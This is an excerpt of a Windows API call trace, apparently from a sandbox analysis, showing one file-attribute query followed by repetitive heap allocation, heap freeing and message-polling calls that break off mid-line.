GetFileAttributesW (lpFileName="C:\\PROGRA~2\\COMMON~1\\26207383702620738370" (normalized: "c:\\progra~2\\common~1\\26207383702620738370")) returned 0x20 [0268.382] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbe6e30 | out: hHeap=0xb80000) returned 1 [0268.382] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd47320 | out: hHeap=0xb80000) returned 1 [0268.382] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a2b8 | out: hHeap=0xb80000) returned 1 [0268.382] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99d48 | out: hHeap=0xb80000) returned 1 [0268.382] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xda5948 | out: hHeap=0xb80000) returned 1 [0268.382] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd47350 | out: hHeap=0xb80000) returned 1 [0268.382] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd472b0 | out: hHeap=0xb80000) returned 1 [0268.382] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x38) returned 0xdd5fd8 [0268.382] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.382] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdd5fd8 | out: hHeap=0xb80000) returned 1 [0268.382] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.382] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xda5948 [0268.383] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99d48 [0268.383] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xd472b0 [0268.383] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99d48 | out: hHeap=0xb80000) returned 1 [0268.383] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xda4ea8 [0268.383] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99d48 [0268.383] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a2b8 [0268.383] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xd47350 [0268.383] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a2b8 | out: hHeap=0xb80000) returned 1 [0268.383] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd47350 | out: hHeap=0xb80000) returned 1 [0268.383] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.383] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xda5650 [0268.383] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a2b8 [0268.383] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xd47350 [0268.383] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a2b8 | out: hHeap=0xb80000) returned 1 [0268.383] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xda5808 [0268.383] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a2b8 [0268.383] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a3f0 [0268.383] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xd47320 [0268.383] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a3f0 | out: hHeap=0xb80000) returned 1 [0268.383] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd47320 | out: hHeap=0xb80000) returned 1 [0268.383] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.383] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xda5560 [0268.383] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a3f0 [0268.383] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xd47320 [0268.383] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a3f0 | out: hHeap=0xb80000) returned 1 [0268.384] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xda4ed0 [0268.384] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a3f0 [0268.384] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a270 [0268.384] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xd47340 [0268.384] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a270 | out: hHeap=0xb80000) returned 1 [0268.384] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd47340 | out: hHeap=0xb80000) returned 1 [0268.384] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.384] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xda55b0 [0268.384] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a270 [0268.384] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xd47340 [0268.384] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a270 | out: hHeap=0xb80000) returned 1 [0268.384] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x30) returned 0xc9f350 [0268.384] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a270 [0268.384] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a2e8 [0268.384] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xd47330 [0268.384] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a2e8 | out: hHeap=0xb80000) returned 1 [0268.384] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd47330 | out: hHeap=0xb80000) returned 1 [0268.384] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.384] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xda4e80 [0268.384] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a2e8 [0268.384] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xd47330 [0268.384] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a228 [0268.384] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a450 [0268.384] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xd47310 [0268.384] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a450 | out: hHeap=0xb80000) returned 1 [0268.385] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd47310 | out: hHeap=0xb80000) returned 1 [0268.385] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.385] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xda56f0 [0268.385] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a450 [0268.385] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xd47310 [0268.385] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a450 | out: hHeap=0xb80000) returned 1 [0268.385] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xda5c40 [0268.385] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a450 [0268.385] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a318 [0268.385] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xd472e0 [0268.385] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a318 | out: hHeap=0xb80000) returned 1 [0268.385] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd472e0 | out: hHeap=0xb80000) returned 1 [0268.385] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.385] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xda5c68 [0268.385] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a318 [0268.385] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xd472e0 [0268.385] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a318 | out: hHeap=0xb80000) returned 1 [0268.385] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xda5c90 [0268.385] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a318 [0268.385] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a498 [0268.385] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xd47270 [0268.385] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a498 | out: hHeap=0xb80000) returned 1 [0268.385] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd47270 | out: hHeap=0xb80000) returned 1 [0268.385] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.386] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xda5cb8 [0268.386] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a498 [0268.386] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xd47270 [0268.386] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a498 | out: hHeap=0xb80000) returned 1 [0268.386] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xda5ce0 [0268.386] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a498 [0268.386] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99af0 [0268.386] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xd472a0 [0268.386] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99af0 | out: hHeap=0xb80000) returned 1 [0268.386] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd472a0 | out: hHeap=0xb80000) returned 1 [0268.386] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.386] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xda5d08 [0268.386] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99af0 [0268.386] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xd472a0 [0268.386] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99af0 | out: hHeap=0xb80000) returned 1 [0268.386] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xda5d30 [0268.386] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99af0 [0268.386] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a618 [0268.386] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xd47300 [0268.386] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a618 | out: hHeap=0xb80000) returned 1 [0268.386] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd47300 | out: hHeap=0xb80000) returned 1 [0268.386] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.386] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xda5d58 [0268.386] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a618 [0268.387] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xd47300 [0268.387] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a618 | out: hHeap=0xb80000) returned 1 [0268.387] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xda5d80 [0268.387] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a618 [0268.387] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99d78 [0268.387] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xd472f0 [0268.387] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99d78 | out: hHeap=0xb80000) returned 1 [0268.387] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd472f0 | out: hHeap=0xb80000) returned 1 [0268.387] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.387] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xda5da8 [0268.387] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99d78 [0268.387] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xd472f0 [0268.387] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99c40 [0268.387] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99ce8 [0268.387] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xd472c0 [0268.387] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99ce8 | out: hHeap=0xb80000) returned 1 [0268.387] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd472c0 | out: hHeap=0xb80000) returned 1 [0268.387] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.387] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xda5dd0 [0268.387] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99ce8 [0268.387] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xd472c0 [0268.387] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99ce8 | out: hHeap=0xb80000) returned 1 [0268.387] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xda5df8 [0268.387] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99ce8 [0268.388] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99bc8 [0268.388] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xd47360 [0268.388] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99bc8 | out: hHeap=0xb80000) returned 1 [0268.388] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd47360 | out: hHeap=0xb80000) returned 1 [0268.388] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.388] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xda5e20 [0268.388] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99bc8 [0268.388] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xd47360 [0268.388] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a678 [0268.388] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99dd8 [0268.388] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xd47370 [0268.388] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99dd8 | out: hHeap=0xb80000) returned 1 [0268.388] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd47370 | out: hHeap=0xb80000) returned 1 [0268.388] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.388] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xda5e48 [0268.388] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99dd8 [0268.388] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xd47370 [0268.388] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99b80 [0268.388] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99e08 [0268.388] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xd47380 [0268.388] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99e08 | out: hHeap=0xb80000) returned 1 [0268.388] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd47380 | out: hHeap=0xb80000) returned 1 [0268.388] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.388] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xda5e70 [0268.388] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99e08 [0268.389] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xd47380 [0268.389] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99e08 | out: hHeap=0xb80000) returned 1 [0268.389] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xda5e98 [0268.389] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99e08 [0268.389] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a660 [0268.389] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xd47390 [0268.389] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a660 | out: hHeap=0xb80000) returned 1 [0268.389] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd47390 | out: hHeap=0xb80000) returned 1 [0268.389] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.389] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xda5ec0 [0268.389] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a660 [0268.389] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xd47390 [0268.389] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a660 | out: hHeap=0xb80000) returned 1 [0268.389] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xda5ee8 [0268.389] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a660 [0268.389] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99ad8 [0268.389] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xd473a0 [0268.389] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99ad8 | out: hHeap=0xb80000) returned 1 [0268.389] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd473a0 | out: hHeap=0xb80000) returned 1 [0268.389] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.389] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xda5f10 [0268.389] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99ad8 [0268.389] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xd473a0 [0268.389] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99ad8 | out: hHeap=0xb80000) returned 1 [0268.389] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xda5f38 [0268.390] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99ad8 [0268.390] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a300 [0268.390] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xd473b0 [0268.390] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a300 | out: hHeap=0xb80000) returned 1 [0268.390] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd473b0 | out: hHeap=0xb80000) returned 1 [0268.390] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.390] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xda5f60 [0268.390] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a300 [0268.390] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xd473b0 [0268.390] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a300 | out: hHeap=0xb80000) returned 1 [0268.390] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x30) returned 0xdfa558 [0268.390] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a300 [0268.390] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a3a8 [0268.390] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xd473c0 [0268.390] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a3a8 | out: hHeap=0xb80000) returned 1 [0268.390] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd473c0 | out: hHeap=0xb80000) returned 1 [0268.390] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.390] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xda5f88 [0268.390] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a3a8 [0268.390] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xd473c0 [0268.390] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a3a8 | out: hHeap=0xb80000) returned 1 [0268.390] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xda5fb0 [0268.390] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a3a8 [0268.390] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a708 [0268.391] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xd473d0 [0268.391] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a708 | out: hHeap=0xb80000) returned 1 [0268.391] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd473d0 | out: hHeap=0xb80000) returned 1 [0268.391] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.391] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xda5fd8 [0268.391] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a708 [0268.391] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xd473d0 [0268.391] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a708 | out: hHeap=0xb80000) returned 1 [0268.391] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x30) returned 0xdfa590 [0268.391] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a708 [0268.391] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99d00 [0268.391] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xd473e0 [0268.391] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99d00 | out: hHeap=0xb80000) returned 1 [0268.391] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd473e0 | out: hHeap=0xb80000) returned 1 [0268.391] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.391] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xda6000 [0268.391] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99d00 [0268.391] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xd473e0 [0268.391] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99d00 | out: hHeap=0xb80000) returned 1 [0268.391] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xda6028 [0268.391] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99d00 [0268.391] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99df0 [0268.391] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xd473f0 [0268.391] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99df0 | out: hHeap=0xb80000) returned 1 [0268.391] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd473f0 | out: hHeap=0xb80000) returned 1 [0268.392] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.392] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xda6050 [0268.392] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99df0 [0268.392] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xd473f0 [0268.392] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99df0 | out: hHeap=0xb80000) returned 1 [0268.392] RtlAllocateHeap 